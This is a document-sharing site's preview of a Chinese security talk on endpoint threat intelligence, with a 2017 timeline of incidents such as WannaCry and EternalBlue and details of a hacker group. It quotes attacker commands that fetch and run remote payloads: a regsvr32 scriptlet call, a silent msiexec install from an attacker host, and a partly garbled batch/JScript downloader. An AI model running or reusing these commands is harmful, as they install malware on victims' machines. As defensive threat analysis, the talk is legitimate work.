网站大量收购独家精品文档,联系QQ:2885784924

代码战争的主阵地——来自终端的威胁情报详述.pdf

代码战争的主阵地——来自终端的威胁情报详述.pdf

  1. 1、本文档共17页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
代码战争的主阵地——来自终端的威胁情报详述

代码战争的主阵地 :来自终端的威胁情报详述 周 军 火绒安全联合创始人 • 2017/2/2 :”Mirai”物联网病毒变种 – /newish-mirai-spreader-poses-new-risks/77621/ • 2017/4/14 :微软针对”Shadow Brokers”泄漏漏洞发布Blog – /msrc/2017/04/14/protecting-customers-and-evaluating-risk/ • 2017/5/12 :勒索病毒”Wannacry”席卷全球 – / msrc/2017/05/12/customer -guidance-for-wannacrypt-attacks/ • 2017/5/15 :报道称发现利用”EternalBlue”入侵服务器挖矿 – /us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue- doublepulsar • 2017/5/17 :报道称中国黑客利用”EternalBlue”传播后门 – /eternalblue-exploit-actively-used-deliver-remote-access-trojans/ • 2017/6/27 :新”Petya”病毒通过泄漏漏洞卷土重来 – /wiki/Petya_(malware) “隐匿者” 一个“低调”的黑客组织 终端威胁信息感知 远程脚本运行 C:\Windows\System32\ regsvr32.exe /u /s /i:http://js.mykings.top :280/v.sct scrobj.dll 运行远程MSI安装包 C:\Windows\System32\ msiexec.exe /i http://js.mykings.top :280/helloworld.msi /q cmd /c echo=1/*nulc:\az1.batecho @clsc:\az1.batecho echo offc:\az1.batecho call :http /js/a.exe c:\a.exec:\az1.batecho start c:\a.exec:\az1.batecho :httpc:\az1.batecho cscript -nologo -e:jscript %~f0 %~1 %~2c:\az1.batecho goto :eofc:\az1.batecho */c:\az1.batecho var iLocal,iRemote,xPost,sGet;c:\az1.batecho iLocal =WScript.Arguments(1);c:\az1.bat echo iRemote = WScript.Arguments(0);c:\az1.bat echo iLocal=iLocal.toLowerCase();c:\az1.batecho xPost = new 隐藏执行可疑脚本 ActiveXObject(MSXML2.XMLHTTP.3.0);c:\az1.batecho xPost.Open(GET,iRemote,0);c:\az1.batecho xPost.Send();c:\az1.batecho sGet = new ActiveXObject(ADODB.Stream);c:\az1.batecho sGet.Mode = 3;c:\az1.batecho sGet.Type = 1;c:\az1.bat echo sGet.Open();c:\az1.bat echo sGet.Write(xPost.responseBody);c:\az1.batecho

您可能关注的文档

文档评论(0)

qiwqpu54 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档